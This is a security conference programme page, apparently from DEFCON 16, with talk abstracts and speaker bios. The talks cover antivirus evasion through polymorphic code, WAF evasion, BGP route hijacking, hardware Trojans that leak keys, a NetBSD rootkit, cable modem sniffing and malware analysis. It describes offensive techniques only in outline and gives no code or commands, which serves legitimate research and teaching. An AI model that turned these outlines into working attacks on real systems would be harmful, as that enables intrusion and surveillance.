Kurt Grutzmacher is a CISSP, but don't hold that against him. Lots of us have it because it keeps us employed. He was employed by the Federal Reserve System for 15 years, 5 of those in the official capacity of performing penetration tests and security reviews. Currently he works at Pacific Gas & Electric, one of the largest public utilities in the United States. Kurt has provided updates to the Metasploit Framework directly related to LM/NTLM support.

Top of page

Satan is on my Friends list: Attacking Social Networks


Nathan Hamiel
Senior Consultant, Idea Information Security
Shawn Moyer
CTO, Agura Digital Security

Social Networking is shaping up to be the perfect storm... An implicit trust of those in one's network or social circle, a willingness to share information, little or no validation of identity, the ability to run arbitrary code (in the case of user-created apps) with minimal review, and a tag soup of client-side user-generated HTML (Hello? MySpace? 1998 called. It wants its markup vulns back). Yikes.

But enough about pwning the kid from homeroom who copied your calc homework. With the rise of business social networking sites, there are now thousands of public profiles with real names and titles of people working for major banks, the defense and aerospace industry, federal agencies, the US Senate... A target-rich and trusting environment for custom-tailored, laser-focused attacks.

Our talk will show the results of a series of public experiments aimed at pointing out the security and privacy ramifications of everyone's increasingly open, increasingly connected online personae and the interesting new attack vectors they've created.

Plus, we get to have some fun violating scads of EULAs, AUPs, and Terms of Service along the way.

K. THX FOR THE ADD!!1!

YOU RAWK.

Nathan Hamiel is a Senior Consultant for Idea Information Security and the founder of the Hexagon Security Group. He is also an Associate Professor at the University of Advancing Technology. Nathan has previously presented at numerous other conferences including DefCon, Shmoocon, Toorcon, and HOPE.

Nathan spent much of DefCon 15 without shoes and is planning ahead this year with a defense-in-depth approach that includes failover footwear. He has 1,936 people in his extended network, and finds that disturbing on a number of levels.

Shawn Moyer is CISO of Agura Digital Security, a web and network security consultancy. He has led security projects for major multinational corporations and the federal government, written for Information Security magazine, and spoken previously at BH and other conferences.

Shawn is currently working on a slash frantic adaptation of 2001:A Space Odyssey, told from the perspective of Hal9000. He only accepts friend requests on Facebook if they include a DNA sample and a scanned copy of a valid driver's license or passport.

Top of page

Advanced Software Armoring and Polymorphic Kung Fu


Nick Harbour
Principal Consultant, Mandiant

This presentation discusses the techniques employed by a new anti-reverse engineering tool named PE-Scrambler. Unlike a traditional executable packer which simply compresses or encrypts the original executable, this tool has the ability to permanently modify the compiled code itself. With the ability to modify compiled programs at the instruction level a vast array of Anti-Reverse Engineering techniques are possible that would traditionally have been performed only by hand by seasoned hackers. In addition to thwarting a would-be reverse engineer, the tool has the ability to randomly modify code in a program in a fashion that keeps the functionality of the program in-tact. This is useful for modifying a program to defeat signature recognition algorithms such as those used in Anti-Virus programs. In this presentation we will discuss several of these Anti-Reverse Engineering and Polymorphic techniques in depth. A new technique and tool for detecting armored and packed binaries will also be discussed and demonstrated.

In addition to learning about two new security tools, attendees will learn state-of-the-art anti-disassembly and anti debugging techniques. Attendees' eyes will be opened to the vast world of possibility that lies in the future for binary armoring and develop a true contempt for the binary packers of today.

Nick Harbour is a Principal Consultant with Mandiant. He specializes in Malware Analysis and Incident Response as well as both offensive and defensive research and development. He also occasionally teaches malware analysis and reverse engineering. Nick's nine year history in the security industry began as a researcher and forensic examiner at the DoD Computer Forensics Lab (DCFL) where he helped pioneer the field of computer forensics. Nick is a developer of open source software including most notably dcfldd, the popular forensic disk imaging tool, tcpxtract, a tool for carving files out of network traffic and Mandiant Red Curtain, a tool for identifying malicious binaries. Nick is also a trained chef!

Top of page

A Hacker Looks at 50


G. Mark Hardy
Founder, National Security Corporation

Take a trip back in time and discover what hacking was like in the pioneer days -- before the Internet, the PC, or even the Commodore 64 or TRS-80. The speaker started "exploring" computer systems in 1973, when the only law about hacking was the hacker ethic itself. Join a humorous reminiscence about what it was like building an Altair 8800, "discovering" the 2600 Hz tone, storing programs on punched cards, cracking bad crypto, and more. You'll find the people and principles haven't changed, only the speed of the hardware.

G. Mark Hardy CISSP, CISM, CISA, founded National Security Corporation in 1988. Since his first legitimate computer security job in 1976 for $2.10/hour, he has presented several hundred talks on information security. A perennial speaker at major security conferences, he's popular for his entertaining and informative style.

Top of page

Playing with Web Application Firewalls


Wendel Guglielmetti Henrique
Penetration Test Analyst - Intruders Tiger Team Security

WAF (Web Application Firewalls) are often called 'Deep Packet Inspection Firewalls' because they look at every request and response within the HTTP/HTTPS/SOAP/XML-RPC/Web Service layers. Some WAFs look for certain 'attack signatures' to try to identify a specific attack that an intruder may be sending, while others look for abnormal behavior that doesn't fit the websites normal traffic patterns. Web Application Firewalls can be either software, or hardware appliance based and are installed in front of a webserver in an effort to try and shield it from incoming attacks.

Today WAF systems are considered the next generation product to protect websites against web hacking attacks, this presentation will show some techniques to detect, fingerprint and evade them. Affiliated to Hackaholic team (http://hackaholic.org/) and working as penetration tester to a Brazilian company called SecurityLabs in the Intruders Tiger Team division - One of leaders company of segment in Brazil, among our clients are government, credit card industry, etc.

Wendel Guglielmetti Henrique has worked with IT since 1997, during the last 7 years he has worked in the computer security field. He found vulnerabilities in many softwares like webmails, Access Points, Citrix Metaframe, etc. Some tools he wrote already were used as examples in articles in national magazines like PCWorld Brazil and international ones like Hakin9 Magazine. During the last 3 years he has worked as Pen-tester.

Top of page

War Ballooning-Kismet Wireless "Eye in the Sky"


Rick Hill
Senior Scientist, Tenacity Solutions, Inc.

Using a Balloon as an aerial network surveillance platform, a.k.a. "WarBallooning" is an idea that evolved as a natural progression out of my Rocket-based experiment @ Defcon 14 entitled, "WarRocketing - Network Stumbling 50 sq. miles in < 60 seconds."

Interestingly, after my presentation in 2006, many in the wireless community discussed Balloon-based network discovery, notably CoWF & Slashdot. But, alas, like many great concepts in the scientific community, I found after much research (2008) that sadly to my (& Google's) knowledge no one has yet demonstrated WarBallooning ... Until Today!

My team, (with the help of CoWF and DEFCON support staff) will demonstrate WarBallooning @Defcon 16 over the Riviera Hotel. Wardriving coverage is limited by obstructions such as trees, houses, and terrain. Our latest aerial platform, (a 6 ft. Helium Balloon) does not have these limitations. Essentially, it was built to provide a superior Line-of-Sight, enabling the Wardriver to rapidly recon. a fairly large urban area.

Most Notable Feature: The Kismet "Eye in the Sky" actually beams live video back as the antenna targets various buildings (& networks.)
The presentation will include details of all hardware hacks involved in the construction: WRT54G, Alchemy, Kismet Drone, & IP camera modifications. No prerequisite - only an interest in Network Stumbling and Wireless Technology.

Rick Hill CISSP, works as an information security engineer for Tenacity Solutions, an IT consulting firm based in Reston, VA. Specializing in Wireless Security, his consulting gig involves C&A of govt. networks, site surveys, and performing network security assessments. Outside the day job, Rick enjoys boating, downhill skiing, and is an avid top-fuel drag racing fan... The speed fetish and love of technical hardware lead naturally to his 2 favorite hobbies: High Power Rocketry & Netstumbling. (You may recall the "WarRocketing" talk that he presented two years ago @DEFCON 14). Since that time: Rick's acquired much more professional netstumbling time, built several cool wireless devices, and now mixes his own rocket fuel. He's attending DEFCON 16 to check out the Wireless Village and to give a talk about his newest flying & hardware hacking adventure.

Top of page

Under the iHood


Cameron Hotchkies
Vulnerability Analysis, TippingPoint

The market share for Apple devices has grown considerably over the past few years, but most reverse engineering topics still focus on Microsoft platforms. This talk will outline what is necessary to begin reversing software on OS X. This will include a rundown of the tools available to an apple based researcher, how Objective-C works and what it looks like in a binary, the basics of the Mach-O file format including the undocumented _OBJC section and comparisons of Windows applications and the OS X counterparts.

Cameron Hotchkies has been a vulnerability researcher for TippingPoint's DVLabs since 2005. His day to day tasks include verification and analysis of Zero Day Initiative submissions, internal product security audits and a whole lot of reverse engineering. Prior to this he created the Absinthe/SQueaL automated SQL injection engine. He doesn't do web stuff anymore. Just reverse engineering. He holds a Bachelor's Degree in Software Engineering from McMaster University.

Top of page

Race-2-Zero Unpacked


Simon Howard
Founder, Mince Research

Signaure-based Antivirus is dead, we want to show you just how dead it is. This presentation will detail our findings from running the Race-2-Zero contest during DC16. The contest involves teams or individuals being given a sample set of malicious programs to modify and upload through the contest portal. The portal passes the modified samples through a number of antivirus engines and determines if the sample is a known threat. The first to pass their sample past all antivirus engines undetected wins that round. Each round increases in complexity as the contest progresses.

Topics covered will include:

Prize giving ceremony with celeb judging panel... prizes will be awarded for

Simon Howard With a penchant for black t-shirts, jeans and the lyrical styling of Pantera, Simon has been touching computers ever since he can remember.

Top of page

The Death of Cash:


The loss of anonymity and other dangers of the cash free society


Tony Howlett
President, Network Security Services

In this talk, we will discuss the pros and cons (mostly cons) of the cash less society and how it might endanger your privacy and civil liberties. This movement towards the elimination of cash has been picking up speed and mostly accepted by the populace as a huge convenience. We examine some reasons why this isn't such a good thing. We also look at legislation and laws in this area that give banks and the government unprecedented ability to track your financial transactions, cash and non with little or no cause. And finally some ways to avoid this scrutiny and protect your financial privacy.

Tony Howlett is President of Network Security Services, Inc. He was previously founder and CTO of InfoHighway Communications Corp., a leading ISP and CLEC. He is a frequent speaker and writer on security, the Internet and technology. He is the author of "Open Source Security Tools" as well as numerous articles for SysAdmin, Security Administrator, Windows Web Solutions, Windows IT Pro, Texas Computing and Computer Currents magazines. He is the co-host of the IT Security Blog "Fearless Security" on www.windowitpro.com. Type "Tony Howlett" into Google to get additional references.

Top of page

Ham For Hackers- Take Back the Airwaves


JonM
Security Consultant & Amateur Radio Operator

Think amateur radio is all about dorks with walkie talkies? Think again. Amateur radio presents one of the last bastions for open radio experimentation. This talk will provide a brief introduction to amateur radio, explain the advantages of licensed spectrum for experimentation, and describe how to get involved in the leading edge of radio hacking.

JonM has been a licensed amateur radio operator for nearly a decade, but has never worn a radio on his belt. He holds an Amateur Extra license, the highest level granted in the US. When not mucking with the airwaves,he is a consultant specializing in application security.

Top of page

TBA


Dan Kaminsky

Abstract to Come.

Bio to Come.

Top of page

Stealing The Internet - A Routed, Wide-area, Man in the Middle Attack


Anton Kapela
Security Researcher
Alex Pilosov
Security Researcher

In this presentation we're going to show Defcon how broken the Internet is, how helpless its users are without provider intervention, and how much apathy there is towards routing security.

With the method described in this talk, an attacker is able to gain full control and visibility of all IP packets heading towards an arbitrary destination prefix on the Internet. From the perspective of the victims network, every inbound packet they receive will have first taken the 'scenic route' through the attackers network before getting reaching the true destination.

The presentation will show attendees how (roughly) BGP works on the Internet, how and what providers do (or don't do) when interconnecting their networks, concluding with a discussion of the hijacking method and a live demo of 'man in the middled' traffic, in-flight, to an undisclosed destination, including countermeasures employed to further obscure the interception and ensure nearly perfect network transparency. Ettercap and others please stand aside - routed Internet hijacking has come of age!

Tkap (xam) & Pilo have presented at Defcon in the past but never before with this much spit & vinegar. Tkap usually talks about layer-1 and 2 stuff, like microwaves and data transport technologies. Pilo usually talks about optical transport systems and other layer-1 technologies, but he likes routing security too!

Top of page

Demonstration of Hardware Trojans


Fouad Kiamilev
Professor, Electrical & Computer Engineering Dept., University of Delaware
Ryan Hoover
Graduate Student

Recent developments such as the FBI operation "Cisco Raider" that resulted in the discovery of 3,500 counterfeit Cisco network components show the growing concern of U.S. government about an electronic hardware equivalent of a "Trojan horse". In an electronic Trojan attack, extra circuitry is illicitly added to hardware during its manufacture. When triggered, the hardware Trojan performs an illicit action such as leaking secret information, allowing attackers clandestine access or control, or disabling or reducing functionality of the device. The growing use of programmable hardware devices (such as FPGAs) coupled with the increasing push to manufacture most electronic devices overseas means that our hardware is increasingly vulnerable to a Trojan attack from potential enemies.

This talk explores three possible methods that a hardware Trojan can use to leak secret information to the outside world: thermal, optical and radio. The hardware platform for our demonstration is a $149 Spartan-3E Starter Kit from XILINX. The application used in our demonstration is AES encryption. The objective of our Trojan is to illicitly leak the AES encryption keys once triggered.

In the thermal Trojan demo, we use an infrared camera to show how electronic components or exposed connector pins can be used to transmit illicit information thermally. In the optical Trojan demo, we use an optical-to-audio converter to show how a power-on LED can be used to transmit illicit information using signal frequencies undetectable by human eyes. Finally, in the radio Trojan demo, we use a radio receiver to show how an external connector can be used to transmit illicit information using AM radio transmission.

We finish our talk with a demonstration of an optical Trojan that leaks the encryption keys from a popular commercial network router (e.g. Cisco-Linksys WRT54GS).

Fouad Kiamilev is a professor in the Department Electrical and Computer Engineering at the University of Delaware where he directs a group of pirates who call themselves CVORG (which stands for CMOS VLSI Optimization Research Group). Fouad's main mission is to train students to become successful participants in the 21st century global economy. Since 1997, he has advised 12 Ph.D. students and 16 M.S. students. His graduates are employed by leading academic and industrial organizations in the United States. Fouad's research group, CVORG, specializes in custom hardware design for special applications. Present CVORG projects include tester for world-record performance solar module, 512x512 mid-wave and long-wave infrared display chip, and red-team hacking.

Ryan Hoover is a graduate student in professor Kiamilev's research group at the University of Delaware. Ryan completed his undergraduate Bachelor's degree in Computer Engineering in May there. Ryan minored in Computer Science and was one of two students who carried out the hardware Trojan research for the CVORG research group.

Top of page

WhiteSpace: A Different Approach to JavaScript Obfuscation


Kolisar
Security Researcher

A different approach to JavaScript obfuscation will be presented. There are certain telltale indicators within an obfuscated JavaScript file which can be used for detection and protection. These signs occur in almost all obfuscated JavaScript and are easily detected via software and visual inspection. This different approach addresses these telltale indicators and provides a method of JavaScript obfuscation which hides these indicators from both automated and visual inspection.

Kolisar began writing software at the age of 10. His first computer was a Commodore Vic-20 with a whopping 3K or RAM. After high school and attending a technical school he spent nearly 20 years as a software engineer writing CAM tools on UNIX and Windows, machine control and CRM software in C/C++, Java, JavaScript, VBScript, etc., and occasionally hand optimizing assembly graphics code for performance. He is currently working in the security department of a medium-sized company where he does security research, vulnerability and risk assessment, incident response and reverse engineering malware.

Top of page

Flux on: EAS (Emergency Alert System)


Matt "DCFLuX" Krick
Chief Engineer, New West Broadcasting Systems, Inc.

Discover the great mystery that is the Emergency Alert System. An elaborate way for the President of the United States to have his or her voice heard from every broadcast outlet at the same time. It can also perform other less important rolls such as letting the public know when their lives may be in danger by several natural occurring and man made events.

Matt Krick is Chief Engineer of New West Broadcasting Systems, Inc., Operators of broadcast stations KGMN-FM, KZKE-FM, KYET AM and KKAX-LP. He has worked in the field of broadcasting since 1998, specializing in all aspects of broadcast engineering and video editing.

Top of page

Career Mythbusters:


Separating Fact from Fiction in your Information Security Career


Lee Kushner
President, LJ Kushner and Associates, LLC
Mike Murray
Director of Neohapsis Labs

How long should my resume be? Do I really need to be a Manager? Do I need to attend business school? What certifications do I need? Does my title matter? Should I go after money or a cool job? What are the hot skills du jour? How do I use LinkedIn and Facebook? All of these questions are asked continually by Information Security professionals as they assess their current positions and determine which future opportunities align with their aspirations. Mike Murray and Lee Kushner return to the DefCon stage to answer these questions and dispel the prevailing myths that permeate the information security industry. Participants should leave the presentation with a better way to map out their own career and separate fact from fiction as they make decisions on how to pursue their ultimate career goals.

Lee Kushner is the President of LJ Kushner and Associates, LLC, an Executive Search firm dedicated exclusively to the Information Security industry and its professionals. Founded in 1999, LJ Kushner has successfully represented Fortune 2000 companies, Information Security Software Companies, Information Security Services Companies and large technology firms in enabling them to locate, attract, hire, and retain top level Information Security talent. He has been an invited speaker on the subjects of recruitment, retention, and industry trends at Information Security Conferences that include The Black Hat Briefings, The RSA Security Conference, Information Security Decisions, and a variety of ISSA Chapter Conferences.

Mike has spent his entire career in information security, starting in the late 90's as a penetration tester and vulnerability researcher up to his current position as the Director of Neohapsis Labs, where he heads up research, testing and analysis of security products. His years of experience as a vulnerability researcher and leader of research teams have convinced him that the most important system to focus on in information security is the human system.

His past few years, while continuing his work on the information security side with nCircle, LURHQ and Liberty Mutual, have been spent focusing extensively on the human side of security. His work helping other security professionals realize how to build a great career in security has been widely recognized, and his talks at major conferences about advanced social engineering techniques have been extremely well-reviewed. Mike's thoughts can be found on his blog at Episteme.ca, as well as his career site at ForgetTheParachute.com. He is the author of an upcoming book from No Starch Press on the intricacies and skills behind advanced social engineering and human exploitation.

Top of page

Taking Back your Cellphone


Alexander Lash
Security Researcher

This presentation will cover a variety of topics of interest to anyone on a cellphone network in the US. I'm going to cover how to use your own backends for MMS and WAP access, unlock Bluetooth tethering, and circumvent some of the more obnoxious carrier restrictions.

Of course, the best part is baking your own firmware and running your own code. I'll provide an overview of the processes necessary to do so, a quick rundown of what you can expect from your carrier, a few tools and docs I've assembled to take a little pain out of the process, and all of the information you'll need to void your warranty with gusto and panache.

I'll provide several demonstrations you can follow along with on your own phone. The more restricted your phone is, the more mileage you'll get out of this talk --- and one lucky audience member will have their warranty voided live!

Alexander Lash has been tampering with cellular phones for ten years and putting together mobile applications for four. He's been putting together tools and docs while taking apart firmware and carrier systems, and takes personal offense at the idea of not being able to write code for his own hardware. (Pay no attention to the fact that he's left a trail of dead phones in his wake.)

Top of page

Comparison of File Infection on Windows & Linux


lclee_vx
Founder F-13 Labs
lychan25

This talk documents the common file infection strategies that virus writers have used over the years, conduct the comparison of Portable Executable (PE) file infection on the Windows platform and Executable and Linking Format (ELF) file infection on the Linux Platform.

lclee_vx founded the Independent Virus Group F-13 Labs. Also is active virus coder in EOF-Project. lclee_vx has worked in one of the security company in Malaysia, served for 4 years as the security consultant. Now further the study in University Kebangsaan Malaysia as Ph.D (Doctor of Philosophy) student, majoring Antivirus Core Engine Design and work as Security Engineer in Computer Sciences Corporation (CSC).

lychan25 has been working in cyber security industry for the recent 2 years. lychan25 was previously Security Consultant and also member of Independent Virus Group F-13 Labs. Now further the study in University Kebangsaan Malaysia as Ph.D (Doctor of Philosophy) student, majoring The Art of Packing/Unpacking.

Top of page

Developments in Cisco IOS Forensics


"FX" Felix Lindner
Head of Recurity Labs

Attacks on network infrastructure are not a new field. However, the increasing default protections in common operating systems, platforms and development environments increase interest in the less protected infrastructure sector. Today, performing in-depth crash analysis or digital forensics is almost impossible on the most widely used routing platform.

This talk will show new developments in this sector and how a slightly adjusted network infrastructure configuration together with new tools finally allows to separate crashed, attacked and backdoored routers from each other. We walk through the known types of backdoors and shellcodes for IOS as well as their detection and the challenges in doing so.

"FX" Felix Lindner runs Recurity Labs. FX has over 10 years experience in the computer industry, eight of them in consulting for large enterprise and telecommunication customers. He possesses a vast knowledge of computer sciences, telecommunications and software development. His background includes managing and participating in a variety of projects with a special emphasis on security planning, implementation, operation and testing using advanced methods in diverse technical environments. FX is well known in the computer security community and has presented his and Phenoelit's security research on Black Hat Briefings, CanSecWest, PacSec, DEFCON, Chaos Communication Congress, MEITSEC and numerous other events. His research topics included Cisco IOS, HP printers, SAP and RIM BlackBerry. Felix holds a title as State-Certified Technical Assistant for Informatics and Information Technology as well as Certified Information Systems Security Professional.

Top of page

Toying with Barcodes


"FX" Felix Lindner
Head of Recurity Labs

The talk focuses on 1D and 2D barcode applications with interference possibilities for the ordinary citizen. Ever wondered what is in these blocks of squares on postal packages, letters and tickets? Playing with them might have interesting effects, reaching from good old fun to theft and severe impact.

Barcodes have been around for ages, but most of the time were used as simple tags with a number. The rise of 2D barcodes started to put them into customer hands as authentication, authorization, payment method and other arbitrary data transport. The implicit trust in them is enormous. The talk gives a very quick intro into barcodes and then proceeds to review the contents of selected samples, including their usage in the real world. This is going to be fun, tool release included.

"FX" Felix Lindner runs Recurity Labs. FX has over 10 years experience in the computer industry, eight of them in consulting for large enterprise and telecommunication customers. He possesses a vast knowledge of computer sciences, telecommunications and software development. His background includes managing and participating in a variety of projects with a special emphasis on security planning, implementation, operation and testing using advanced methods in diverse technical environments. FX is well known in the computer security community and has presented his and Phenoelit's security research on Black Hat Briefings, CanSecWest, PacSec, DEFCON, Chaos Communication Congress, MEITSEC and numerous other events. His research topics included Cisco IOS, HP printers, SAP and RIM BlackBerry. Felix holds a title as State-Certified Technical Assistant for Informatics and Information Technology as well as Certified Information Systems Security Professional.

Top of page

Malware RCE: Debuggers and Decryptor Development


Michael Ligh
Security Intelligence Engineer, iDEFENSE
Greg Sinclair
Rapid Response Engineer, VeriSign iDefense Rapid Response

This talk will focus on using a debugger to reverse engineer malware, with an emphasis on building decryption tools for credential recovery and command/control (c&c) inspection. Most modern-day trojans exhibit cryptography, or just home-grown obfuscation techniques, to prevent analysis of the stolen data or c&c protocol. This presentation will show how to script the debugger such that it leverages the trojan's own internal functions to decrypt information of the researcher's choice. The concepts will be demonstrated using current threats such as Feebs, Silent Banker, CoreFlood, Torpig/MBR, Kraken, Prg/Zues, and Laqma.

Michael Hale Ligh is currently a security intelligence engineer at Verisign iDefense. He specializes in reverse engineering malware to provide in-depth analysis on capabilities, techniques, and decryption services. In the past, Michael obtained his masters in forensic computer investigation in 2004 and began providing Internet security services to financial institutions. He then gained interest in vulnerability research and has been credited with locating critical flaws in products such as Tumbleweed MailGate, Novell iMonitor/eDirectory, Symark PowerBroker, and F5 FirePass SSL VPN. Michael is a member of ZERT and has submitted winning entries in several malware related contests/challenges (SANS malware analysis, honeynet.org scan-of-the-month, and hacker challenge 2007). More of Michael's research is available online at www.mnin.org.

Greg Sinclair is a member of the Rapid Response Team that provides quick analysis and remediation techniques for malcode threats. Before joining Verisign, he worked for two years as a risk assessment security engineer for Healthcare Services Corporation (HCSC) in Chicago. At HCSC, Mr. Sinclair was responsible for analyzing production systems to find, and report on, unknown vulnerabilities before the vulnerabilities could be exploited by attackers. Mr. Sinclair specializes in reverse engineering applications to identify weaknesses and functionality. Prior to HCSC, he was the Head of IT Security for Strayer University for 3 years where he was responsible for developing and implementing IT security policies and protection mechanisms for Strayer's 45 campuses and corporate offices. Mr. Sinclair graduated from the University of North Carolina at Charlotte in 2001 with a BS in Computer Science.

Top of page

Tuning Your Brain


Lyn

I can't tell you how often I'm listening to trance, goa or industrial when I'm coding. Often when we're stuck in a black hole, or just can't figure the problem out - the right music will help. Why does this work? It seems motivating, and it seems like we solve problems easier, and it seems to create a flow. Turns out, your brain is like a tuning fork. This talk will include a bit of biology - going over the basics of the brain structures, neurons, synapses and neurotransmitters, before getting to how music affects the brain, and how it helps us think.

Lyn is a web developer with a lot of time on her hands apparently. Her last EE experience was in the 5th grade, soldering boards for a $5 allowance. Oh, and she once was a research assistant and spent a lot of time attaching electrodes and preparing study participants for an EEG. Neurology has been her hobby since then.

Top of page

Feed my Sat Monkey


Major Malfunction

In this confused rant^W^W talk, I will explain why the little green men are right, and also know how to party. I will show you some new toys. Shiny ones. Ones that go 'beep' and have flashy lights. You will like it, and I will be able to return to my home planet, mission accomplished, to the adulation of the triple-breasted masses and the reward of a grateful nation, followed by tea, medals and an inadequate state pension. Or I'll go to jail, whichever's quicker and/or cheaper.

OK, so you've sated your almost bottomless appetite for pr0n, obscure sports, late night poker and reality TV from countries you've never heard of and hopefully will never have to visit, so what else is there to do? What else is up there? (Apart from little green men, obviously... which are completely real, BTW... You should see some of the stuff we've got over in... oh, wait... I'm not supposed to talk about that... ) Where was I? Oh, yes... so I've got about a gazillion channels on a trillion satellites all bobbing about above me in space, but what are they all doing? How can I find anything interesting amongst all that background noise? Enough with the pr0n already! I want to see something cool! I want something nobody else is getting! I want what THE MAN's got!!! I want to be able to say to my friends "It just comes to you... This stuff just flies through the air... They send this information out - it's just beamed out all over the fuckin' place... All you have to do is know how to grab it... See, I know how to grab it.". And stuff like that. Yeah, baby. That would be HOT!

I'll also talk about something else. Something that'll probably get me whacked. So let's not talk about it yet, eh?

Miss Moneypenny says that Major's been a very naughty boy and can't come out to play today. Instead, he'll stay after skewl and write a thousand times ""I am not a Secret Agent in the employ of Her Majesty's Secret Service, I do not take tea with Little Green Men, and my cover name is not Adam Laurie"". His travels to security conferences around the world will be suspended until further notice, and Governments, Police, Military, Big Business, Little Business and Little Boys will no longer pay attention to his (strange) advice. When he claims to have a Secret Nuclear Bunker, his tuck will be confiscated and he will be sent to Matron for 'Special Treatment' (and we all know what THAT means, don't we? Yes, Matron). Now, heads down and get back to work, and no talking at the back there! I SAW that, Gates minor! Report to me after class..."

Top of page

Fear, Uncertainty and the Digital Armageddon


Morgan Marquis-Boire
Principal Consultant, Security-Assessment.com

We now live in an age where attacks on critical infrastructure will cause real world harm. An increasing global concern regarding cyber-terrorism reflects the problem critical infrastructure security poses for many large IT consulting companies, telecommunications providers, utilities and industrial companies.

SCADA networks are the foundation of the infrastructure which makes everyday life possible in most first world countries. This talk will provide an introduction to critical infrastructure environments and SCADA networks and the major differences that exist between understood security best practice and the protective measures regularly found (or not) in these networks.

The most common security mistakes will be covered, as will real world examples taken from penetration testing SCADA environments. Additionally, this talk will expose some of the potentially catastrophic consequences of a failure in a production SCADA environment. There will be an examination of the critical infrastructure hysteria which is currently in vogue and some consideration of steps which can be taken to secure these networks and prevent cyber-terrorism.

Morgan Marquis-Boire is a Principal Security Consultant at Security-Assessment.com where he specializes in Unix, forensics, and network security. He has a degree in philosophy and enjoys big kit and forgotten networks. Prior to his present incarnation as a corporate security guy, he's worked doing cluster computing, government infrastructure, Linux security appliances, and a security start-up in Japan. He has penned articles for magazines, written whitepapers, and presented at conferences around the world on a diverse range of subjects from SAN Security to Anonymous Network Technologies.

Top of page

Sniffing Cable Modems


Guy Martin
Security Researcher

Cable modems are widely used these days for internet connections or other applications. This talk gives a detailed overview of this mean of communication with a focus on its security.

DOCSIS (Data Over Cable Service Interface Specification) is currently the most used protocol around the world for providing internet over TV coaxial cable. Due to its nature, this protocol can easily be sniffed by taping onto the TV cable using a digital TV card. By doing this, you can not only sniff your own connection but all the connections of the entire neighborhood. With my tool packet-o-matic and an inexpensive DVB-C card, countless things are possible ranging from dumping people's email into maildir to removing firewall rules and quota limitation on your connection or even a DoS of all HTTP communications by injecting TCP reset packets.

Guy Martin is an active open source developer interested in all technologies that comes to his hands. After porting Gentoo Linux on the HPPA architecture five years ago, he's now primarily focused on writing a new kind of sniffer, packet-o-matic.

Top of page

Toasterkit, a Modular NetBSD Rootkit


Anthony Martinez
Systems Administrator, New Mexico Tech
Thomas Bowen
Systems Administrator, New Mexico Tech

NetBSD is a portable operating system for just about every architecture available. There is a notable lack of tools available for the penetration tester. In this talk we will present Toasterkit, a generic NetBSD rootkit. It has been tested on i386, Mac PPC, and VAX systems.

Anthony Martinez is a system administrator for the New Mexico Tech Computer Center, and an undergraduate Computer Science student at the university.

Thomas Bowen is a system administrator for the New Mexico Tech Computer Center, and an undergraduate student in Computer Science with emphasis in Information Assurance. He has been accepted into Scholarship for Service program, funded by the National Science Foundation, and plans to also complete his Masters of Science in Computer Science at the university.

Top of page

Bringing Sexy Back: Breaking in with Style


David Maynor
CTO, Errata Security
Robert Graham
CTO, Errata Security

Security is getting better; there is no doubt about that. High value targets are increasing their security while buying into the buzzword hype with phrases like "defense in depth". Firewalls, IPS, AV, NAC, and a host of other technologies have done a lot to give the pointy hair bosses of the world the ability to sleep easy...or has it. While those PHB sleep easy in their bed the ability to compromise a site at will continues to grow.

Remember the good old days of planting Trojans in microcontrollers of your enemy's hardware or shipping packages with system updates that contain backdoors? What happened to those days? What if I told you that breaking into a site is as easy as sending a package via some third party carrier or throwing up a website. This talk will cover penetration techniques that at first glance appear to be Hollywood fiction but are easy and reliable methods of intrusion.

Miss this talk and you may never know why you have a package in your shipping department addressed to "U R Owned, INC.".

David Maynor is a founder of Errata Security and serves as the Chief Technical Officer. Mr. Maynor is responsible for day-to-day technical decisions of Errata Security and also employs a strong background in reverse engineering and exploit development to produce Hacker Eye View reports. Mr. Maynor has previously been the Senior Researcher for Secureworks and a research engineer with the ISS Xforce R&D team where his primary responsibilities included reverse engineering high risk applications, researching new evasion techniques for security tools, and researching new threats before they become widespread. Before ISS Maynor spent the 3 years at Georgia Institute of Technology (GaTech), with the last two years as a part of the information security group as an application developer to help make the sheer size and magnitude of security incidents on campus manageable.

Robert Graham is the co-founder and CTO of Errata Security, a firm specializing in cybersecurity consulting and product verification. Mr. Graham learned hacking as a toddler from his grandfather, a WW-II codebreaker. His first IDS was written more than 10 years ago designed to catch Morris-worm copycats. He is the author of several pending patents in the IDS field. He is the author of well-regarded security-related documents and is a frequent speaker at conferences. Previously he was the chief scientists of Internet Security Systems. Before that he was the co-founder, CTO, and chief-architect of Network ICE which was acquired by Internet Security Systems.

Top of page

Forensics is ONLY for Private Investigators


Scott Moulton
President of Forensic Strategy Services, LLC

If the only requirement for you to become a Computer Forensic person is to be a Private Investigator, why would you ever take a certification again? You would never need to be a CCE (computer certified examiner), nor any other certification of any kind. You would be one of the only people in your area that could legally do the job and why spend a single dime you don't have to? These new laws will destroy certifications and qualifications as we know it, and we will be pushed out of our own industry!

I was the one of the first experts to be challenged on the new Private Investigator laws while on the stand testify in a criminal case in 2006. This is the bill that actually passed in 2006 a week before I took the stand and was challenged by state prosecution. It simply states that doing any kind of 'digital investigation' without a PI license is a felony.

http://www.legis.state.ga.us/legis/2005_06/fulltext/hb1259.htm

When they passed the law in March of 2006 they intended for it to go into effect on July 1st, 2006 with no grandfather clause. Since it takes 2 years to become a PI in the state of Georgia, immediately everyone that was a third party practicing forensics would be a felony.

In Georgia it is a 2 year apprenticeship, then a test and a pile of money and insurance (PI's have to have 2 million in EandO) and then 40 hours of continuing education a year specifically on PI topics in certified classes. Currently I do not know of any on computer forensics that qualify for the PI continuing education. The inclusion of computer forensics in the PI license does not change a single item for the existing PI tests, knowledge base, or requirements. A security guard would be able to do a computer forensic job legally where the CISSP could not.

Since this time, my company has become a Private Investigation company and I have a Private Investigator License. This is a talk about the struggles of becoming a PI and what the laws are for computer forensics going forward. Everyone that does computer security for any legal purpose, or computer forensics as a third party stands to lose as these laws are being passed all over the United States. In the future it may be impossible for "you" to go out on your own doing any kind of "DIGITAL" security or forensic work limiting your future forever!

I hope that everyone who never pays any attention to legislation and their own laws, spends a little time reviewing the laws they are trying to slip in without your even knowing it is coming. There is a great ignorance amongst computer security and computer forensic people that just disbelieves this can even happen. However a few states like Texas have already made this a law and it is affecting the industry now and causing quite a few well know computer forensic people to walk away from jobs. I hope everyone listens and gets involved and joins together this fragmented society of computer security and forensic people into one voice that makes the states take notice that we will not standby and let government make our choices for our future!

